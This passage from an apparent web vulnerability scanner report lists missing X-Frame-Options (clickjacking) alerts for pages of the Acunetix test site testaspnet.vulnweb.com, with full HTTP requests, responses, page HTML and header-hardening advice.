href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          </TD>
          				</TR>
          				<TR>
          					<TD colSpan="2">
          					</TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Parameter
          X-Frame-Options
          Solution

          Most modern Web browsers support the X-Frame-Options HTTP header. Ensure it's set on all web pages returned by your site. If you expect the page to be framed only by pages on your server (e.g. it's part of a FRAMESET), use SAMEORIGIN; if you never expect the page to be framed, use DENY. Alternatively, consider implementing Content Security Policy's "frame-ancestors" directive.

        3. GET http://testaspnet.vulnweb.com/about.aspx
          Alert tags
          Alert description

          The HTTP response does not include the X-Frame-Options header, which protects against 'ClickJacking' attacks.

          Request
          Request line and header section (314 bytes)
          GET http://testaspnet.vulnweb.com/about.aspx HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Referer: http://testaspnet.vulnweb.com
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (0 bytes)
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:17 GMT
          Content-Length: 14467
          
          
          Response body (14467 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>About</title>
          		<meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1">
          		<meta name="CODE_LANGUAGE" Content="C#">
          		<meta name="vs_defaultClientScript" content="JavaScript">
          		<meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="about.aspx" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZLDaiLtIJBFGHdHW8BBidJDZ856t" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="E809BCA5" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="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" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD id="tdPageData" valign="top">
          						<h1>About this website</h1>
          						<p>The website was built with the intention to test the Acunetix Web Vulnerability 
          							Scanner. For this reason this website have <b>lot of bugs</b> to demonstrate 
          							the forementioned software's capabilities to find those bugs.</p>
          						<p><b>Please DO NOT use this website as a blog or news site. DO NOT post any sensitive 
          								information on this site. This includes e-mail addresses or real names.</b></p>
          						<h1>About Acunetix</h1>
          						<P><B>Combating the web vulnerability threat<BR>
          							</B>Securing a company's web applications is today's most overlooked aspect of 
          							securing the enterprise. Web application hacking is on the rise with as many as 
          							75% of cyber attacks done at web application level or via the web. Most 
          							corporations have secured their data at the network level, but have overlooked 
          							the crucial step of checking whether their web applications are vulnerable to 
          							attack. Web applications, which often have a direct line into the company's 
          							most valuable data assets, are online 24/7, completely unprotected by a 
          							firewall and therefore easy prey for attackers.</P>
          						<P>Acunetix was founded with this threat in mind. We realised the only way to 
          							combat web site hacking was to develop an automated tool that could help 
          							companies scan their web applications for vulnerabilities. In July 2005, 
          							Acunetix Web Vulnerability Scanner was released - a tool that crawls the 
          							website for vulnerabilities to SQL injection, cross site scripting and other 
          							web attacks before hackers do.</P>
          						<P>The Acunetix development team consists of highly experienced security developers 
          							who have each spent years developing network security scanning software prior 
          							to starting development on Acunetix WVS. The management team is backed by years 
          							of experience marketing and selling security software.</P>
          						<P>Acunetix is a privately held company with its <A href="https://www.acunetix.com/company/contact/">
          								offices</A> in Malta, US and the UK.
          						</P>
          					</TD>
          
          					<TD vAlign="top" width="200">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          
          					</TD>
          				</TR>
          				<TR>
          					<TD colSpan="2">
          					</TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Parameter
          X-Frame-Options
          Solution

          Most modern Web browsers support the X-Frame-Options HTTP header. Ensure it's set on all web pages returned by your site: if you expect the page to be framed only by pages on your server (e.g. it's part of a FRAMESET), use SAMEORIGIN; if you never expect the page to be framed, use DENY. Alternatively, consider implementing Content Security Policy's "frame-ancestors" directive.

        4. GET http://testaspnet.vulnweb.com/ads/def.html
          Alert tags
          Alert description

          X-Frame-Options header is not included in the HTTP response to protect against 'ClickJacking' attacks.

          Request
          Request line and header section (355 bytes)
          GET http://testaspnet.vulnweb.com/ads/def.html HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Referer: http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=0
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (0 bytes)
          Response
          Status line and header section (246 bytes)
          HTTP/1.1 200 OK
          Content-Type: text/html
          Last-Modified: Fri, 24 May 2019 07:50:37 GMT
          Accept-Ranges: bytes
          ETag: "eb6cf45f512d51:0"
          Server: Microsoft-IIS/8.5
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:20 GMT
          Content-Length: 488
          
          
          Response body (488 bytes)
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
          <html>
          	<head>
          		<title></title>
          		<meta name="GENERATOR" content="Microsoft Visual Studio .NET 7.1">
          		<meta name="ProgId" content="VisualStudio.HTML">
          		<meta name="Originator" content="Microsoft Visual Studio .NET 7.1">
          	</head>
          	<body>
          		<P align="center"><STRONG>Is your website hackable?<BR>
          				check with<BR>
          				<IMG src="acunetix.gif"><BR>
          				Web Vulnerability Scanner</STRONG></P>
          	</body>
          </html>
          
          Parameter
          X-Frame-Options
          Solution

          Most modern Web browsers support the X-Frame-Options HTTP header. Ensure it's set on all web pages returned by your site: if you expect the page to be framed only by pages on your server (e.g. it's part of a FRAMESET), use SAMEORIGIN; if you never expect the page to be framed, use DENY. Alternatively, consider implementing Content Security Policy's "frame-ancestors" directive.

        5. GET http://testaspnet.vulnweb.com/Comments.aspx?id=0
          Alert tags
          Alert description

          X-Frame-Options header is not included in the HTTP response to protect against 'ClickJacking' attacks.

          Request
          Request line and header section (322 bytes)
          GET http://testaspnet.vulnweb.com/Comments.aspx?id=0 HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Referer: http://testaspnet.vulnweb.com
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (0 bytes)
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:18 GMT
          Content-Length: 13707
          
          
          Response body (13707 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>Comments</title>
          		<meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1">
          		<meta name="CODE_LANGUAGE" Content="C#">
          		<meta name="vs_defaultClientScript" content="JavaScript">
          		<meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="Comments.aspx?id=0" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTg2MjcwMzE2Mg9kFgICAQ9kFggCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjUvMTYvMjAxOSAxMjozMjozMCBQTWQCBQ8WBB8BBT5BY3VuZXRpeCBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgTm93IFdpdGggTmV0d29yayBTZWN1cml0eSBTY2Fucx8ABRJSZWFkTmV3cy5hc3B4P2lkPTBkAgcPFgIfAQVEU2VhbWxlc3MgT3BlblZBUyBpbnRlZ3JhdGlvbiBub3cgYWxzbyBhdmFpbGFibGUgb24gV2luZG93cyBhbmQgTGludXhkZD0ABLMUBs9bepCq8oSQPQHk/TUy" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="58A73C4D" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="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" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD vAlign="top">
          						<DIV id="divNewsDate" class="NewsDate">posted by <strong>admin                    </strong>5/16/2019 12:32:30 PM</DIV>
          						<a href="ReadNews.aspx?id=0" id="anchNewsTitle" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</a>
          						<DIV id="divNewsShort" class="NewsShort">Seamless OpenVAS integration now also available on Windows and Linux</DIV>
          						<div id="divComments">User comments:
          							<table id="tblComments" cellspacing="0" cellpadding="0" width="500" border="0">
          </table>
          
          						</div>
          						<TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0">
          							<TR>
          								<TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD>
          							</TR>
          							<TR>
          								<TD class="Comment" vAlign="middle">
          									<textarea name="tbComment" rows="2" cols="20" id="tbComment" class="CommentTA"></textarea>
          									<input type="submit" name="btnSend" value="Send comment" id="btnSend" /></TD>
          							</TR>
          							<TR>
          								<TD vAlign="top"><IMG src="images/comment-after.gif"></TD>
          							</TR>
          						</TABLE>
          					</TD>
          					<TD vAlign="top" width="200">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a 